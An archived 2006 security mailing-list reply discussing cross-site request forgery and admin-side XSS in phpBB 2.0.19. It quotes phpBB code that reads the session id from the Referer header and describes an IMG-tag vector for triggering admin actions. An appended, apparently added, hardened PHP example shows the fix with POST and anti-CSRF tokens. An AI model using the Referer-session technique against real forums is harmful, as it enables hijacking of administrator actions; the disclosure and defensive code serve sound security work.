Open Source and information security mailing list archives
Date: Fri Feb  3 14:29:13 2006
From: max at jestsuper.pl (Maksymilian Arciemowicz)
Subject: phpBB 2.0.19 Cross Site Request Forgeries and XSSAdmin

> From: Berliner <berliner.does.not.mean.jelly.donut_at_googlemail.com> 
> 1. Basically all phpBB admin-side options do allow full HTML, including
> javascript. That is the intended behaviour, as there are legitimate uses.
> 
> phpBB does however check the Session ID before allowing the changes to go to
> the database.
> Your exploit needs a valid admin session key and you need to get the admin
> to visit the page (unless you happen to have a lot of luck with your IP)- be
> it by a link or a reflecting page. And even then, it will only work, when
> the admin has logged into the ACP prior to running into the trap.
> 

<?php
/* phpBB 2.0.19 code quoted by the author: the session id is read out of the
   HTTP Referer header, so a request whose Referer is a forum URL carrying
   "sid=" gets that sid appended to the redirect. $operation is defined by
   the surrounding phpBB code. */
$sid = '';
preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);

if ($sid[1] != '') {
    header("Location: " . $operation . "&sid=" . $sid[1]);
}

If you have, for example, <IMG SRC="http://SOME.SCRIPT.PHP"> and you send a referer... 
(tested in IE, Mozilla, etc.), then please check getenv('HTTP_REFERER').

The phpBB team was informed about these issues and they confirmed that these 
vulnerabilities exist in phpBB 2.0.19. The solution is to use POST for all 
operations.

> 2. That is a general problem with all pages allowing off-site pictures. It
> has been discussed on the list before. Most of your examples won't work with
> phpBB, due to the missing Session ID in the links. 


-- 
pub   1024D/7FDF4CEE 2005-09-21
uid                  Maksymilian Arciemowicz (cXIb8O3) <max@...tsuper.pl>
sub   2048g/AE816DB6 2005-09-21

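The Referer-derived session id pattern quoted in the message above, shown beside a hardened admin handler, as an added example that is neither phpBB's code nor the author's. It goes one step beyond the POST-only fix the message mentions by also requiring a per-session anti-CSRF token; every function, array key and sample value below is hypothetical.

```php
<?php
// Added example, not phpBB's code: the Referer-derived sid pattern beside a
// hardened admin handler. All function and key names here are hypothetical.

// Vulnerable pattern: accept whatever "sid=" appears in the Referer header.
function sid_from_referer(string $referer): string
{
    $m = [];
    preg_match('#sid\=?([0-9a-z]*)#i', $referer, $m);
    return $m[1] ?? '';
}

// Issue one anti-CSRF token per authenticated session (e.g. at admin login)
// and render it as a hidden field in every admin form.
function issue_csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hardened handler: state-changing actions are POST-only, the session id is
// taken from the server-side session (never from URL or Referer), and the
// submitted token must match the session's token.
function admin_action_allowed(array $server, array $post, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false; // a GET triggered by <img src=...> is rejected outright
    }
    if (empty($session['sid']) || empty($session['csrf_token'])) {
        return false; // no authenticated admin session
    }
    $token = $post['csrf_token'] ?? '';
    // constant-time comparison, so the token cannot be matched byte by byte
    return is_string($token) && hash_equals($session['csrf_token'], $token);
}

// Constructed sample: a Referer from a forum page whose URL carried the sid.
$referer = 'http://forum.example/admin/index.php?sid=0123456789abcdef';
echo 'sid recovered from Referer: ' . sid_from_referer($referer) . PHP_EOL;

$session = ['sid' => 'server-side-session-id'];
$token   = issue_csrf_token($session);
var_dump(admin_action_allowed(['REQUEST_METHOD' => 'GET'], [], $session));
var_dump(admin_action_allowed(['REQUEST_METHOD' => 'POST'], ['csrf_token' => $token], $session));
```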